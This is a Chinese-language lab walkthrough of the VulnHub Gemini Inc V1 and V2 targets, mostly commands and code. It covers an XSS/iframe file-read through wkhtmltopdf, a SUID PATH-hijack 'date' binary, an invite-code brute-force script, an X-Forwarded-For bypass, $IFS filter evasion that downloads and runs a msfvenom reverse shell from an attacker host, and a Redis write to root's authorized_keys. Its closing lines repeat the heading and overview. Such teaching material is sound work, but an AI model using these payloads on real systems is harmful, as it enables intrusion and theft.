VulnHub Gemini Inc 渗透测试教学文档<\/h1>

1. 环境概述<\/h2>
Gemini Inc 是 VulnHub 上的一个渗透测试靶机，包含两个版本 V1 和 V2。本教学文档将详细讲解两个版本的渗透测试过程，涵盖从信息收集到提权的完整流程。<\/p>

2. V1 版本渗透测试<\/h2>

2.1 主机发现<\/h3>

使用 arp-scan<\/code> 发现目标主机 IP：<\/p>

arp-scan -l
<\/span><\/span><\/code><\/pre>发现目标 IP 为 192.168.75.147<\/code><\/p>
2.2 端口扫描<\/h3>
使用 nmap 进行全端口扫描：<\/p>
nmap -p 1-65535 -T4 -A -sV 192.168.75.147
<\/span><\/span><\/code><\/pre>发现开放端口：<\/p>

22 (SSH)<\/li>
80 (HTTP)<\/li>
<\/ul>
2.3 Web 应用分析<\/h3>

访问 80 端口，在 test2<\/code> 目录下发现 web 应用<\/li>
使用 dirb 进行目录扫描：<\/li>
<\/ol>
dirb http:\/\/192.168.75.147\/test2\/
<\/span><\/span><\/code><\/pre>
在 install.php<\/code> 中发现安装时会写入默认账号 admin:1234<\/code>（MD5 加密）<\/li>
<\/ol>
2.4 利用 PDF 生成功能<\/h3>


使用默认凭据 admin:1234<\/code> 登录<\/p>
<\/li>

发现两个功能：<\/p>

编辑个人资料<\/li>
将个人资料导出为 PDF<\/li>
<\/ul>
<\/li>

XSS 测试：<\/p>

在修改名字时输入 <script>alert(1)<\/script><\/code> 产生 XSS<\/li>
生成的 PDF 中显示使用了 wkhtmltopdf<\/code> 进行转换<\/li>
<\/ul>
<\/li>

利用 wkhtmltopdf 漏洞：<\/p>

wkhtmltopdf 存在 SSRF 和文件读取漏洞<\/li>
创建恶意 PHP 文件 1.php<\/code>：<\/li>
<\/ul>
<?<\/span>php<\/span> 
<\/span><\/span>$file =<\/span> $_GET['file'<\/span>]; 
<\/span><\/span>header<\/span>("location:file:\/\/<\/span>$file<\/span>"<\/span>); 
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>
在 name 字段注入：<\/li>
<\/ul>
<iframe<\/span> src<\/span>=<\/span>"http:\/\/192.168.75.131\/1.php?file=\/etc\/passwd"<\/span> width<\/span>=<\/span>"100%"<\/span> height<\/span>=<\/span>1220<\/span>><\/iframe<\/span>>
<\/span><\/span><\/code><\/pre>
成功读取 \/etc\/passwd<\/code>，发现用户 gemini1<\/code><\/li>
尝试读取 \/home\/gemini1\/.ssh\/id_rsa<\/code> 获取 SSH 私钥<\/li>
<\/ul>
<\/li>
<\/ol>
2.5 SUID 提权<\/h3>

查看内核版本：<\/li>
<\/ol>
uname -a
<\/span><\/span><\/code><\/pre>显示为 4.9.0，无直接可用 exp<\/p>

查找可利用的 SUID 文件：<\/li>
<\/ol>
find \/ -perm -4000 2>\/dev\/null
<\/span><\/span><\/code><\/pre>发现可疑文件 listinfo<\/code><\/p>

分析 listinfo<\/code>：<\/li>
<\/ol>
strings listinfo
<\/span><\/span><\/code><\/pre>发现调用了 date<\/code> 命令且未使用绝对路径<\/p>

创建恶意 date<\/code> 程序：<\/li>
<\/ol>
#include<\/span> <sys\/types.h><\/span>
<\/span><\/span><\/span>#include<\/span> <unistd.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>() {
<\/span><\/span>    setuid(0<\/span>);
<\/span><\/span>    setgid(0<\/span>);
<\/span><\/span>    system("\/bin\/bash"<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>编译并上传：<\/p>
gcc 1.c -o date
<\/span><\/span>export PATH=<\/span>\/path\/to\/date:$PATH
<\/span><\/span><\/code><\/pre>
运行 listinfo<\/code> 获取 root 权限<\/li>
<\/ol>
3. V2 版本渗透测试<\/h2>
3.1 主机发现<\/h3>
arp-scan -l
<\/span><\/span><\/code><\/pre>发现目标 IP 为 192.168.75.149<\/code><\/p>
3.2 端口扫描<\/h3>
与 V1 相同，开放 22 和 80 端口<\/p>
3.3 Web 应用分析<\/h3>


目录扫描发现新目录：<\/p>

registration.php<\/code><\/li>
activate.php<\/code><\/li>
users_list.php<\/code><\/li>
<\/ul>
<\/li>

注册账号需要邀请码，提示为 6 位数字<\/p>
<\/li>

使用 Python 脚本爆破邀请码：<\/p>
<\/li>
<\/ol>
import<\/span> requests
<\/span><\/span>import<\/span> re
<\/span><\/span>
<\/span><\/span>s =<\/span> requests.<\/span>session()
<\/span><\/span>
<\/span><\/span>def<\/span> post<\/span>(num):
<\/span><\/span>    url =<\/span> 'http:\/\/192.168.75.149\/activate.php'<\/span>
<\/span><\/span>    cookie =<\/span> {'PHPSESSID'<\/span>: 'husbpgapgpkcdtpedtmn3uj5c7'<\/span>}
<\/span><\/span>    proxies =<\/span> {'http'<\/span>: 'http:\/\/127.0.0.1:8080'<\/span>}
<\/span><\/span>    t =<\/span> s.<\/span>get(url=<\/span>url, cookies=<\/span>cookie)
<\/span><\/span>    token =<\/span> re.<\/span>search("'hidden' name='token' value='(.*?)'"<\/span>, t.<\/span>text).<\/span>group(1<\/span>)
<\/span><\/span>    post_data =<\/span> {'userid'<\/span>: 16<\/span>, 'activation_code'<\/span>: num, 'token'<\/span>: token}
<\/span><\/span>    t =<\/span> s.<\/span>post(url=<\/span>url, cookies=<\/span>cookie, data=<\/span>post_data)
<\/span><\/span>    print(num)
<\/span><\/span>    return<\/span> t
<\/span><\/span>
<\/span><\/span>for<\/span> i in<\/span> range(0<\/span>, 100000<\/span>):
<\/span><\/span>    t =<\/span> post((6<\/span> -<\/span> len(str(i))) *<\/span> '0'<\/span> +<\/span> str(i))
<\/span><\/span>    if<\/span> t.<\/span>status_code !=<\/span> 403<\/span>:
<\/span><\/span>        print('get'<\/span>, num)
<\/span><\/span>        break<\/span>
<\/span><\/span><\/code><\/pre>成功获取邀请码 000511<\/code><\/p>

访问 users_list.php<\/code>，在 HTML 源码中发现被注释的密码：<\/li>
<\/ol>
<!-- <b>Password:<\/b> edbd1887e772e13c251f688a5f10c1ffbb67960d<br\/> --><\/span>
<\/span><\/span><\/code><\/pre>解密 MD5 得到 Gemini:secretpassword<\/code><\/p>
3.4 利用 Admin 功能<\/h3>

使用 Gemini:secretpassword<\/code> 登录<\/li>
发现 admin panel<\/code> 功能但返回 403<\/li>
添加 HTTP 头绕过 IP 限制：<\/li>
<\/ol>
X-Forwarded-For: 127.0.0.1
<\/code><\/pre>
3.5 命令执行绕过<\/h3>

发现命令执行功能但过滤了空格、>、| 等字符<\/li>
使用 $IFS<\/code> 代替空格：<\/li>
<\/ol>
wget$IFS'http:\/\/192.168.75.131\/shell'<\/span>
<\/span><\/span><\/code><\/pre>
使用 msfvenom 生成反弹 shell：<\/li>
<\/ol>
msfvenom -p linux\/x64\/shell_reverse_tcp LHOST=<\/span>192.168.75.131 LPORT=<\/span>23333<\/span> -f elf -o pwn
<\/span><\/span><\/code><\/pre>
下载并执行：<\/li>
<\/ol>
wget$IFS'-P'<\/span>$IFS'\/tmp\/'<\/span>$IFS'http:\/\/192.168.75.131\/pwn'<\/span>
<\/span><\/span>chmod$IFS'777'<\/span>$IFS'\/tmp\/pwn'<\/span>
<\/span><\/span>\/tmp\/pwn
<\/span><\/span><\/code><\/pre>
将公钥写入 \/home\/gemini1\/.ssh\/authorized_keys<\/code> 获取稳定 shell<\/li>
<\/ol>
3.6 Redis 提权<\/h3>

检查 Redis 服务：<\/li>
<\/ol>
ps -ef | grep redis
<\/span><\/span><\/code><\/pre>发现以 root 权限运行<\/p>

尝试连接：<\/li>
<\/ol>
redis-cli -h 127.0.0.1 -p 6379<\/span>
<\/span><\/span><\/code><\/pre>需要认证<\/p>

查找 Redis 密码：<\/li>
<\/ol>
cat \/etc\/redis\/6379.conf | grep pass
<\/span><\/span><\/code><\/pre>获取密码 8a7b86a2cd89d96dfcc125ebcc0535e6<\/code><\/p>

通过 Redis 写入 root 的 authorized_keys：<\/li>
<\/ol>
redis-cli -h 127.0.0.1 -p 6379<\/span> -a 8a7b86a2cd89d96dfcc125ebcc0535e6
<\/span><\/span>config set dir \/root\/.ssh\/
<\/span><\/span>config set dbfilename "authorized_keys"<\/span>
<\/span><\/span>set x "\n\nssh-rsa AAAAB3NzaC1yc2E...\n\n"<\/span>
<\/span><\/span>save
<\/span><\/span><\/code><\/pre>
使用 SSH 密钥登录 root<\/li>
<\/ol>
4. 总结<\/h2>
本教学文档详细讲解了 VulnHub Gemini Inc 靶机两个版本的渗透测试过程，涵盖以下关键技术点：<\/p>

主机发现与端口扫描<\/li>
Web 目录枚举<\/li>
wkhtmltopdf 漏洞利用<\/li>
SUID 提权技术<\/li>
邀请码爆破<\/li>
HTTP 头绕过<\/li>
命令执行绕过技术<\/li>
Redis 未授权访问提权<\/li>
<\/ul>
这些技术在实际渗透测试中具有广泛应用价值，建议在合法授权环境下进行练习。<\/p>

VulnHub Gemini Inc 渗透测试教学文档<\/h1>

1. 环境概述<\/h2> Gemini Inc 是 VulnHub 上的一个渗透测试靶机，包含两个版本 V1 和 V2。本教学文档将详细讲解两个版本的渗透测试过程，涵盖从信息收集到提权的完整流程。<\/p>

2. V1 版本渗透测试<\/h2>

3. V2 版本渗透测试<\/h2>

1. 环境概述<\/h2>
Gemini Inc 是 VulnHub 上的一个渗透测试靶机，包含两个版本 V1 和 V2。本教学文档将详细讲解两个版本的渗透测试过程，涵盖从信息收集到提权的完整流程。<\/p>